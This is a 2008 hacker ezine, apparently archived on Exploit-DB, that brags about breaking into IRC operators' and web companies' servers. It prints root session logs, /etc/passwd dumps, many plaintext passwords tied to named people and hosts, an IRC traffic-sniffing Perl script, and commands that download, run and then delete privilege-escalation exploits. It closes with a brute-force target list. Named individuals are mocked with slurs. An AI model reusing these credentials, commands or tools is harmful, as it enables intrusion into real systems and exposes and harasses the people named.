x0x0x #2

EDB-ID:

42905

CVE:

N/A

Author:

x0x0x

Type:

papers

Platform:

eZine

Published:

2008-03-01

#!/local/efnet/el8/efnet/corporation
################################################
### x0x0x  x0x0x  x0x0x  x0x0x  x0x0x  x0x0x ###
### x0x0x  x0x0x  x0x0x  x0x0x  x0x0x  x0x0x ###
### x0x0x  x0x0x  x0x0x  x0x0x  x0x0x  x0x0x ###
################################################
#                                              #
#                                              #
#            ÛÛÛÛ             ÛÛÛÛ             #
#           ÛÛ± ÛÛ           ÛÛ± ÛÛ²           #
#  ÛÛÛ  ÛÛ ±ÛÛ  ±Û° °ÛÛ  ÛÛ  ÛÛ  ±ÛÛ °ÛÛ  ÛÛ°  #
#   ÛÛ²ÛÛ  ²ÛÛ  °Û²  °Û²ÛÛ   ÛÛ  °ÛÛ  °Û²ÛÛ°   #
#    ÛÛÛ   ²ÛÛ  °Û±   ÛÛÛ    ÛÛ  °ÛÛ   ÛÛÛ     #
#   °ÛÛÛ±  ±ÛÛ  ±Û°   ÛÛÛ±   ÛÛ  ±ÛÛ   ÛÛÛ±    #
#   ÛÛ°ÛÛ   ÛÛ± ÛÛ   ²Û°ÛÛ   ÛÛ± ÛÛÛ  ²Û°ÛÛ²   #
#  ÛÛ²  ÛÛ   ÛÛÛÛ   ²Û²  ÛÛ   ÛÛÛÛ   ²Û²  ÛÛ²  #
#                                              #
################################################
#                                              #
#              .: second zine :.               #
#                                              #
#        [  tribute to efnet el8 corp  ]       #
#                                              #
#                                              #
#   date:    december 2007                     #
#   update:  march 2008                        #
#                                              #
#                                              #
#<><><><><><><><><><><><><><><><><><><><><><><>#
#                                              #
#   -= always keeping the secret identify =-   #
#                                              #
#<><><><><><><><><><><><><><><><><><><><><><><>#

  .''.
 (~~~~)
   ||
 __||__
/______\
  |  |' _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
  |  |'|o| - - - - - - - - - - - - - - - - - - - - - - - - -||
  |  |'| |                                                  ||
  |  |'| |                      . ' .                       ||
  |  |'| |                  . '       ' .                   ||
  |  |'| |              . '    .-'"'-.    ' .               ||
  |  |'| |          . '      ,"       ".      ' .           ||
  |r |'| |      . '        /:   x0x0x   :\        ' .       ||
  |s |'| |  . '            ;  . x0x0x    ;            ' .   ||
  |t |'| |    ' .          \: ..x0x0x   :/          . '     ||
  |  |'| |        ' .        `. . .    ,/       . '         ||
  |  |'| |            ' .      `-.,,.-'     . '             ||
  |  |'| |                ' .           . '                 ||
  |  |'| |                    ' .   . '                     ||
  |  |'| |                        '                         ||
  |  |'|o|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_||
  |  |'
  |  |'
  |  |'  united by brazil  - 100% BRAZUKAAAAAAAAAAAA
  |  |'
  '~~'



\\                                                                                 //
  A long time ago, most part of 'leet' user of efnet network didnt like brazilians,  
  saying they are 'packet kiddies', 'lammers'. these 'leet' users start to believe 
  about it, but they think all  .br guys was that! So we have the idea of laugh of 
  these  'leet boys'  and start  to publish to everbody see what really happens on 
  efnet! hehehe
  Some passwords we´ll not publish, only to avoid surprises in our access!
  They are smart! but! we´re looking at them!
//                                                                                 \\



*/

  TARGETS : SHELL ACCOUNTS && EFNUT HUXORS && IRCOPS && EFNET SERVERS

 /*




STEVOO w45 h4ck3d... oMG iRcop Admin HackEd ??? Yeah.. She/HE Is!!

Stevoo / Stefan !! PoOoooooooooooooWWwwww !!! Results: http://img149.imageshack.us/img149/356/stevootn3.jpg


login as: root
root@83.140.180.6's password:
Last login: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

[root@quagga ~]# uname -a;ifconfig;cat /etc/passwd|grep bash

Linux quagga.webguidepartner.com 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux



#0h 5ur3 n0w w3 4r3 47 stevoo m41n 53rv3r!! okk stevooooooooo =****!!! n0w w3 wi11 5n1ff u!



[root@quagga ~]# cat /etc/passwd|grep bash
root:x:0:0:root:/root:/bin/bash
zabbix:x:1001:1001:,,,:/home/zabbix:/bin/bash
stevoo:x:1002:1002:Stefan Larsson,,,:/home/stevoo:/bin/bash
lunkan:x:1000:1000:,,,:/home/lunkan:/bin/bash
ftp:x:112:65534::/home/ftp:/bin/bash
moffe:x:1003:1003:,,,:/home/moffe:/bin/bash
j-dog:x:1004:1004:,,,:/home/j-dog:/bin/bash
mac:x:1005:1005:,,,:/home/mac:/bin/bash
irc:x:1006:1006:,,,:/home/irc:/bin/bash
ustas:x:1007:1007:,,,:/home/ustas:/bin/bash
dubkat:x:1008:1008:,,,:/home/dubkat:/bin/bash
sonny:x:1009:1009:,,,:/home/sonny:/bin/bash
flyguy:x:1010:1010:,,,:/home/flyguy:/bin/bash



^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^~~~~~~~~~~~~~~~~FINDING NEMOOOOOOOOOOO~~~~~~~~~~~~~~^
^^^^^^^^^^^^^^^^^^^^   ^^^^^   ^^^   ^^^^^^^^^^  ^^^^^

                                     _
                                    (_)
              |    .
          .   |L  /|   .          _
      _ . |\ _| \--+._/| .       (_)
     / ||\| Y J  )   / |/| ./
    J  |)'( |        ` F`.'/        _
  -<|  F         __     .-<        (_)
    | /       .-'. `.  /-. L___       
    J \      <    \  | | O\|.-'  _   
  _J \  .-    \/ O | | \  |F    (_) 
 '-F  -<_.     \   .-'  `-' L__    
__J  _   _.     >-'  )._.   |-'  
`-|.'   /_.           \_|   F    
  /.-   .                _.<     
 /'    /.'             .'  `\    
  /L  /'   |/      _.-'-\
 /'J       ___.---'\|
   |\  .--' V  | `. `
   |/`. `-.     `._)
      / .-.\
VK    \ (  `\
       `.\


[root@quagga ~]# cd /l4m3d1r/; cat p455w0rdz.txt


WIKI
----------------
user = putumayo
pass = utE09X2

FINALTEST
-----------------
user = finaltest
pass = FINAL06tst

POKERLISTINGS.COM
--------------------------------
user = turbonegro
pass = eFb9KLm

POKER USER
--------------------
user = poker
pass = kLmn09Q3

ROOT
----
user = root
pass = 5aB197cQ
NEW = UZk9Taj23
-----------------




THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX
>>>>>>>>>>> AS YOU CAN SEE STEVOO IS A GOOD ADMIN! SAVING PASSWORDZ IN YOUR HOME FILEZZZZZZ <<<<<<<<<<<<
THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX THKX




#dubkat 4nd sonny!!! g00d 74rg3755!!!!!!


#0kkk!! ch3ck1ng 1p5!!!!!!!!!!



[root@quagga ~]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:13:72:7B:7B:C9
          inet addr:83.140.180.6   Bcast:83.140.180.255  Mask:255.255.255.0
          inet6 addr: fe80::213:72ff:fe7b:7bc9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:383711035 errors:0 dropped:0 overruns:0 frame:0
          TX packets:476418783 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3959576563 (3.6 GiB)  TX bytes:1066088994 (1016.7 MiB)
          Interrupt:169

eth0:0    Link encap:Ethernet  HWaddr 00:13:72:7B:7B:C9
          inet addr:83.140.180.2  Bcast:83.140.180.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:169

eth0:1    Link encap:Ethernet  HWaddr 00:13:72:7B:7B:C9
          inet addr:83.140.180.151  Bcast:83.140.180.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1



................................
................................
......................
....................     hmmmmmmmmmmmmm 7h3 1p 15 u53d t0 c0nn3c7 70 efnet.port80.se!! l375 ch3ck ?!?
....................



## Just ip(83.140.180.2 ) can access port80.se, okay honey!! do that!


[root@quagga ~]# ssh -l root -b 83.140.180.2 efnet.port80.se
root@83.140.180.6's password:
Last login: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

[root@efnet ~]# uname -a

FreeBSD efnet.port80.se 6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Sat Nov  3 01:23:30 CET 2007     root@efnet.port80.se:/usr/obj/usr/src/sys/EFNET  i386 



#0hhhhhhhh g0dddddddddddddd!!! port80.se 0wn333333ddddddddddddd!!!! l000000000lllllllll!!!!! l375 ch3ck m4ch1n3



   ***********************************************
  //////////    ///////////\\\\\\\\\\    \\\\\\\\\\
 //////////    !!!ILEGAL TOOL FOUND!!!    \\\\\\\\\\
//////////    ////////////  \\\\\\\\\\\    \\\\\\\\\\
+++++++++++++++++++++++++++++++++++++++++++++++++++++


[root@efnet xxxxx]# cat ircsniff.pl

#!/usr/bin/perl

if(@ARGV == 0) {
  print "Args: $ARGV[0] [port]\n";
  exit(0);
}

if(@ARGV == 1) {
  $port = $ARGV[0];
  open(FH, "tshark -tad -lnx -d tcp.port==$port,irc -R 'irc' |") or die "Unable to open wireshark.";
}
my $packet = "";

while(<FH>) {
  chomp($_);
  chomp($_);

  if($packet && /^$/) {
    for(split /\r\n/, $packet) {
      if(/(:[^ ]+ PRIVMSG .*)$/i) {
        print "<- $1\n";
      } elsif(/(PRIVMSG .*)$/i) {
        print "-> $1\n";
      }
    }
    $packet = "";
  }

  if(/^[\da-f]{4}  (([\da-f]{2} ?)+)   /) {
    my $a = $1;
    $a =~ s/([\da-f]{2})\s?/chr(hex($1))/eg;
    $packet .= $a;
  }
}
close(FH);





%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%
%%%%
%%         later thay say that ircops dont sniffz this server on efnet! there this the test!
%

%


%




Lets Joke:

[root@quagga ~]# wget www.site.com/bnc.perl;perl bnc.perl 8000 st3v0

on irc: 

/server 83.140.180.6:8000

* Connecting to 83.140.180.6 (8000)
-216.47.178.108- *** [BNC 1.8-teste9 por 0ldW0lf - Atrix Team]
-216.47.178.108- *** Digite /QUOTE PASS <senha>
-216.47.178.108- *** Senha aceita. Bem vindo, administrador!
-216.47.178.108- *** Digite /QUOTE CONN <servidor[:porta]> [opções]
-216.47.178.108- *** Para lista os comandos da BNC digite /QUOTE BHELP
-BNC- [Admin LOG]: Usuário administrador logou

/quote conn efnet.port80.se:6667
/server efnet.port80.se
/nick stevoo_gay

#get oper
/oper ***** *****


#COOL stevoo@83.140.180.6 gets spoofed host!! 


/msg #x0x0x h3110 w0r1d!


x0x0x_0wn is stevoo@127.0.0.1 * Stefan Larsson [STLA-RIPE]
x0x0x_0wn using efnet.port80.se We eat more pussy!
x0x0x_0wn is a beaver gourmet (Server Administrator)
x0x0x_0wn has been idle 5secs, signed on Mon Nov 05 16:36:48
x0x0x_0wn End of /WHOIS list.




ll0000000000llllllllllllllllllllll!! stevoo u are the magic!!!!




&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&

7w0 y34r5 5n1ff1ng ur h0m3 b0x stevoo , 7h3n w3 g37 s0m3 4cc355 , my fr13nd
1337´5 533 7h3n ?
x0x0x h4v3 100% 4cc355 1n ur 0wn n37w0rk, 4nd 07h3r5



    ,` `/` `. ,\  
  /` ` ' /, ' ,` \   
   ` / ` ` ' ,.,`,   
 /-/- ``/=   = \ ,`  
  ''  '  @'  @' ) \  
 //|'/ )   |\  |\`    
 cf   (   ,,',, )   
       \__ -- _/    
          `--'       "STEVOO is synonymous of SUPERMAN!" Albert Einstein




       **************************  tevoo
    .*##*:*####***:::**###*:######*.  tevoo
   *##: .###*            *######:,##*  tevoo
 *##:  :####:             *####*.  :##:  tevoo
  *##,:########**********:,       :##:  tevoo
   .#########################*,  *#*  tevoo
     *#########################*##:  tevoo
       *##,        ..,,::**#####:  tevoo
        ,##*,*****,        *##*  tevoo
          *#########*########:  tevoo
            *##*:*******###*  tevoo
             .##*.    ,##*  tevoo
               :##*  *##,  tevoo
                 *####:  tevoo
                   :,  tevoo


&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&
&&&&
&&
&


#Spain Host


[root@x0x0x ~]# ssh 91.142.209.1
root@91.142.209.1's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux es.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit



#Australian Host


[root@x0x0x ~]# ssh 202.125.41.133 -l sonny.sarai
sonny.sarai@202.125.41.133's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux au.int.webguidepartner.com 2.6.9-34.EL #1 Wed Mar 8 00:07:35 CST 2006 i686 athlon i386 GNU/Linux
bash# exit


#Flexservers is a box very important with importants files that i WONT publish !! lol :


[root@x0x0x ~]# ssh 213.239.174.129 
root@213.239.174.129 's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux flexserver.flexservers.com 2.6.22.9 #2 SMP Fri Oct 5 17:52:23 CEST 2007 i686 i686 i386 GNU/Linux
bash# exit


#German Host


[root@x0x0x ~]# ssh 80.86.82.231 -l sonny.sarai
sonny.sarai@80.86.82.231's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux de 2.6.16.1-amd-webperoni-06042006-1 #1 Thu Apr 6 17:01:51 CEST 2006 i686 athlon i386 GNU/Linux
bash# exit




#Idiot box good bandwith ## used to host my worm some days lol



[root@x0x0x ~]# ssh 205.234.178.244
root@205.234.178.244's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux lb1 2.6.15-2-amd64 #1 SMP Tue Aug 28 17:53:01 BST 2007 x86_64 GNU/Linux
bash# exit



#Suomi Host



[root@x0x0x ~]# ssh 217.30.189.33 
root@217.30.189.33's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux fi.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit




#Netherlands Host



[root@x0x0x ~]# ssh 81.171.121.170 
root@81.171.121.170's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux nl.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux (dedicated.by.twilightinc.nl)
bash# exit




#Netherlands Host



[root@x0x0x ~]# ssh 217.30.189.33 
root@217.30.189.33's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux nl.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux (dedicated.by.twilightinc.nl)
bash# exit




#Canada Host



[root@x0x0x ~]# ssh 204.15.197.130 
root@204.15.197.130's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux gw.ca.webguidepartner.com 2.6.9-42.0.3.ELsmp #1 SMP Fri Oct 6 06:21:39 CDT 2006 i686 i686 i386 GNU/Linux
bash# /lib/ldd 2242

83.140.43.249 (per:5!vcAP8!)
83.140.43.49 (stefan:n1nj4h1978) *old pass of stevoo i wont said new pass!*

bash# exit




#Malasya Host



[root@x0x0x ~]# ssh 124.217.250.115 
root@124.217.250.115's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux my.int.webguidepartner.com 2.6.9-42.0.10.ELsmp #1 SMP Tue Feb 27 10:11:19 EST 2007 i686 i686 i386 GNU/Linux
bash# exit




#Spain Host



[root@x0x0x ~]# ssh 75.126.49.137 
root@75.126.49.137's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux es.int.webguidepartner.com 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:28:02 EDT 2006 i686 i686 i386 GNU/Linux
bash# exit




#Usa gayl0rd Host



[root@x0x0x ~]# ssh 69.20.4.41
root@69.20.4.41's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux us.int.webguidepartner.com 2.6.9-42.0.2.EL #1 Thu Aug 17 17:36:53 EDT 2006 i686 athlon i386 GNU/Linux
bash# exit




#Malasya Host


of some boxes i will show some login:password to show that´s not fake! : (per:5!vcAP8!) (sonny.sarai:comp1409sonny) (stefan:n1nj4h1978) (root:JAk9Taj23) (h00h0h0)


[root@x0x0x ~]# ssh 74.53.191.130 
root@74.53.191.130's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux webhostingsearch.com.theplanet.host 2.6.18-8.1.8.el5 #1 SMP Mon Jun 25 17:06:19 EDT 2007 i686 i686 i386 GNU/Linux (82.bf.354a.static.theplanet.com)
bash# exit


//idiots using same root password and personal logins in all boxes!! that´s love!

#Dev dataBase Host




[root@x0x0x ~]# ssh 83.140.180.235 -l anna
root@83.140.180.235's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux devbase 2.6.18-53.1.4.el5PAE #1 SMP Fri Nov 30 01:21:20 EST 2007 i686 i686 i386 GNU/Linux

bash# ssh acad23@204.200.222.171
root@83.140.180.235's password: Eb11Be22
[acad23@academicinfo.net ~]$ exit;

bash# exit



*&#¨*&$#@¨*&($#@¨*&$(¨#@&($*¨#$@&*($¨#(@*&#$¨($@¨#&(
#$¨*&$¨@*&($#@*(¨($#@¨(@#$¨*&(#$@¨&($@#¨*&(

#HAHHAHAHA "FULL HACK"0rz owned!! good hax0rs!!

#$¨*&$¨@*&($#@*(¨($#@¨(@#$¨*&(#$@¨&($@#¨*&(
*&#¨*&$#@¨*&($#@¨*&$(¨#@&($*¨#$@&*($¨#(@*&#$¨($@¨#&(





[root@x0x0x ~]# ssh 83.140.33.134 -l stevoo
stevoo@83.140.33.134 's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux spark.bgpmonkey.net 2.6.20-1.2320.fc5 #1 Tue Jun 12 18:50:38 EDT 2007 i686 i686 i386 GNU/Linux

bash# ssh acad23@204.200.222.171 (acad23:Eb11Be22)

[acad23@academicinfo.net ~]$ exit;

bash# exit




****************************
############################
**#
**#  want get ircop? 
*#
#  try on fulhack irc: /oper stevoo bajs
#







#Other shit



[root@x0x0x ~]# ssh 83.140.2.18 -l per
per@83.140.2.18's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux rock-dk 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux
bash# exit







#Other shit 2!! 



[root@x0x0x ~]# ssh 82.103.140.20 -l Customer
Customer@82.103.140.20's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash$ su root
Password: xxxxxx

bash# uname -a
Linux e82-103-140-20s.easyspeedy.dk 2.6.18-53.el5PAE #1 SMP Mon Nov 12 02:55:09 EST 2007 i686 athlon i386 GNU/Linux
bash# exit





#Other shit 3!! 



[root@x0x0x ~]# ssh 82.140.8.18
root@82.140.8.18's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux mx.rockintention.com 2.6.18-8.1.8.el5 #1 SMP Tue Jul 10 06:50:22 EDT 2007 i686 i686 i386 GNU/Linux
bash# exit





#Other shit 4!! 



[root@x0x0x ~]# ssh 83.140.180.63  (rootpass = mortgage4711)
root@83.140.180.63's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux harry.webguidepartner.com 2.6.18-53.1.13.el5 #1 SMP Tue Feb 12 13:01:45 EST 2008 i686 athlon i386 GNU/Linux
bash# exit






#Other shit 5!! 



[root@x0x0x ~]# ssh 82.96.22.90
root@82.96.22.90's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux se.int.webguidepartner.com 2.6.9-34.0.1.ELsmp #1 SMP Wed May 24 08:14:29 CDT 2006 i686 athlon i386 GNU/Linux
bash# exit






#Other shit 6!! 



[root@x0x0x ~]# ssh 82.103.140.117
root@82.103.140.117's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux rake 2.6.18-8.1.10.el5 #1 SMP Thu Sep 13 12:17:54 EDT 2007 i686 athlon i386 GNU/Linux
bash# exit






#Other shit 7!! 



[root@x0x0x ~]# ssh 83.140.180.3
root@83.140.180.3's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux failover.webguidepartner.com 2.6.9-34.0.2.ELsmp #1 SMP Fri Jul 7 19:52:49 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 8!! 



[root@x0x0x ~]# ssh 83.140.43.100
root@83.140.43.100's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 9!! 



[root@x0x0x ~]# ssh 83.140.43.100
root@83.140.43.100's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 10!! 



[root@x0x0x ~]# ssh 83.140.43.71
root@83.140.43.71's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux skalman 2.6.18-8.el5xen #1 SMP Fri Jan 26 14:42:21 EST 2007 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 10!! 



[root@x0x0x ~]# ssh 83.140.43.26
root@83.140.43.26's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux db.sweden.webguidepartner.com 2.6.9-42.0.2.ELsmp #1 SMP Wed Aug 23 00:17:26 CDT 2006 i686 i686 i386 GNU/Linux
bash# exit






#Other shit 11!! 



[root@x0x0x ~]# ssh 67.192.39.119
root@83.140.43.26's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx

bash# uname -a
Linux 133972-dev.mortgageloan.com 2.6.18-8.1.8.el5 #1 SMP Mon Jun 25 17:06:19 EDT 2007 i686 athlon i386 GNU/Linux
bash# exit



OK! Fuck uname´s !! lets go to something more interesting!



[root@x0x0x ~]# ssh 216.240.158.191 -l lcars
lcars@216.240.158.191's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ wget xpl_local_root_leet.bin; chmod a+x xpl_local_root_leet.bin; ./xpl_local_root_leet.bin

bash# rm -rf xpl_local_root_leet.bin;

bash# uname -a
Linux kingdom.scns.com 2.6.23.14-64.fc7 #1 SMP Sun Jan 20 23:54:08 EST 2008 i686 i686 i386 GNU/Linux
bash# exit







.............................................

             ,-. 
    ,     ,-. s ,-. 
   / \   ( r )-( t ) 
   \ |  ,.>-(   )-< 
    \|,' (   )-(   ) 
     Y ___`-'   `-' 
     |/__/   `-' 
     | 
     | 
     |    -dubkat my flower-
  ___|_____________ 

;................



OkAy my Friend DuBKat ... i know that u are good person... but i need show u something! lol



[root@x0x0x ~]# ssh 72.37.235.2 -l dubkat
dubkat@72.37.235.2's password: sjpd3139

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ wget shmat2; chmod a+x shmat2; ./shmat2
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
...........................................p00f!

NIX@# id

uid=0(root) gid=0(root) 

bash# rm -rf shmat2;

bash# uname -a
FreeBSD riley.rsc.cx 6.2-RELEASE-p5 FreeBSD 6.2-RELEASE-p5 #3: Thu May 24 10:08:07 PDT 2007     sg@riley.rsc.cx:/usr/obj/usr/src/sys/RILEY  i386
bash# exit





.............................................
;................QUAKENET HUB



#Thkxxxxxxx g0d




[root@x0x0x ~]# ssh 64.237.63.164 -l sl
sl@64.237.63.164's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ wget shmat2; chmod a+x shmat2; ./shmat2
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
..................................................................
...........................................p00f!

NIX@# id

uid=0(root) gid=0(root) 

bash# rm -rf shmat2;

bash# uname -a
FreeBSD hub.us.quakenet.org 6.2-RELEASE-p4 FreeBSD 6.2-RELEASE-p4 #0: Tue May 22 13:08:26 EDT 2007     root@qhub.gameservers.com:/usr/obj/usr/src/sys/QUAKENET  i386

bash# netstat -na|grep .6667|wc -l
1544

# lets drop 6667 ? l0lll

bash# exit

Others boxes... that we get on sniff

´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´
´´´´´   FreeBSD fw.webguidepartner.com 6.1-RELEASE-p10 FreeBSD 6.1-RELEASE-p10 #0: Fri Oct 13 03:04:33 UTC 2006     sullrich@builder.livebsd.com:/usr/obj.pfSense/usr/src/sys/pfSense.6  i386
´´´´´   Linux rock-dk 2.6.18-8.el5 #1 SMP Thu Mar 15 19:57:35 EDT 2007 i686 i686 i386 GNU/Linux
´´´´´   Linux lurvas 2.6.9-34.0.2.ELsmp #1 SMP Fri Jul 7 19:52:49 CDT 2006 i686 i686 i386 GNU/Linux (lurvas.webguidepartner.com)






OLD......


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       )/_            
             _.--..---"-,--c_         
        \L..'           ._O__)_       
,-.     _.+  _  \..--( /           
  `\.-''__.-' \ (     \_              
    `'''       `\__   /\              
                ')                   



                                          MONSTERSHELLSSSSSSS (its gone... :(!)

                                       ~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


[root@x0x0x ~]# ssh phisher1@fire.monstershells.com

phisher1@fire.monstershells.com's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ sudo su -
Password:
bash# id
uid=0(root) gid=0(root) groups=0(root)
bash# uname -a
FreeBSD fire.monstershells.com 6.3-RELEASE-p1 FreeBSD 6.3-RELEASE-p1 #0: Fri Feb 15 01:47:13 UTC 2008     root@box.domain.com:/usr/obj/usr/src/sys/fire  i386


****** OH THKS IDIOT ********


some logins there


||;;
|| 
|| login in: john:v1p3r007
|| login in: icon:anthony1
|| login in: hack:seven7
|| login in: kuwait:ln7EZB3LBd
|| login in: absolutely:viper007
|| login in: shield:H4ilhitler!
|| login in: john:v1p3r007
||;; 



PHISHER YOU ARE My POPSTAR!!!


ssh phisher1@home.phisher1.com (98.200.198.242)
phisher1@home.phisher1.com's password: xxxxxxxxxx

Last login: xxxxxxxxxxxxxxxxxxxxxxxxxx


bash$ sudo su -
Password:
bash# id
uid=0(root) gid=0(root) groups=0(root)
bash# uname -a
Linux kubuntu 2.6.22-14-generic #1 SMP Tue Feb 12 07:42:25 UTC 2008 i686 GNU/Linux
bash# 



&&& THKS FOR GIVE UR BOX TO US USE TO CHECK SOME BRUTEFORCE LIST.. THE SAME THAT WE FOUND ON MONSTERSHELLS LOL &&&


bash# cd /dev/.tty64; cat list


ssh oracle@12.0.42.6
ssh oracle@128.59.59.62
ssh oracle@129.173.66.56
ssh oracle@91.103.96.18
ssh oracle@84.242.3.6
ssh oracle@83.17.87.138
ssh oracle@83.149.192.29
ssh oracle@82.94.199.146
ssh oracle@82.91.199.194
ssh oracle@82.147.71.143
ssh oracle@83.149.192.29
ssh oracle@82.147.71.143
ssh oracle@82.147.130.245
